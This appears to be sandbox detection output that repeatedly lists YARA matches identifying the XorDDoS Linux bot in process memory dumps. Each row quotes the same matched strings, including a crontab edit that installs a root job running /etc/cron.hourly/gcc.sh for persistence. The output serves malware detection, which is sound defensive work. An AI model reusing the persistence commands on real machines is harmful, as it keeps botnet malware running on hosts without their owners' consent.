10406.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10428.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10428.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10296.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10296.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9799.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9799.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10120.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10120.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9733.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9733.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9964.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9964.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9777.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9777.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10098.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10098.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9909.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9909.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9612.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9612.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10384.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10384.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9854.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9854.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9557.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9557.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10043.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10043.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9453.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9453.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9920.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9920.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10395.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10395.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10010.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10010.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10186.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10186.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9887.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9887.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9700.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9700.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9755.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9755.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10208.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10208.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9711.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9711.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9450.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9450.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10230.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10230.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9445.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9445.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10142.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10142.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10054.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10054.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10329.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10329.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10373.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10373.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9975.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9975.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9546.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9546.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9810.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9810.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10318.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10318.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9865.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9865.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9988.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9988.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9942.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9942.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10450.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
